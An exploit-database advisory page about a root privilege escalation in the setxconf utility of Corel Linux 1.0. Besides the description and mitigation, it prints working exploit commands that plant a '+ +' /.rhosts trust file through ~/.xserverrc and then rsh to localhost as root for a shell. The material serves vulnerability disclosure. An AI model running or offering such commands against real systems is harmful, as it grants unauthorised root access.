header-logo
Suggest Exploit
vendor:
Linux
by:
SecurityFocus
7.2
CVSS
HIGH
Privilege Escalation
264
CWE
Product Name: Linux
Affected Version From: Corel Linux 1.0
Affected Version To: Corel Linux 1.0
Patch Exists: NO
Related CWE: N/A
CPE: o:corel:linux:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2002

Vulnerability in setxconf utility

A vulnerability exists in the setxconf utility, as shipped with Corel Linux 1.0. The -T option to setxconf will run xinit, which euid root. xinit, when executed, will invoke the contents on ~/.xserverrc. A malicious user could therefore execute commands as root. cat > ~/.xserverrc echo "+ +" > /.rhosts rsh localhost -l root /bin/sh

Mitigation:

Restrict access to the setxconf utility and ensure that the ~/.xserverrc file is not writable by malicious users.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/1008/info

A vulnerability exists in the setxconf utility, as shipped with Corel Linux 1.0. The -T option to setxconf will run xinit, which euid root. xinit, when executed, will invoke the contents on ~/.xserverrc. A malicious user could therefore execute commands as root.

cat > ~/.xserverrc
echo "+ +" > /.rhosts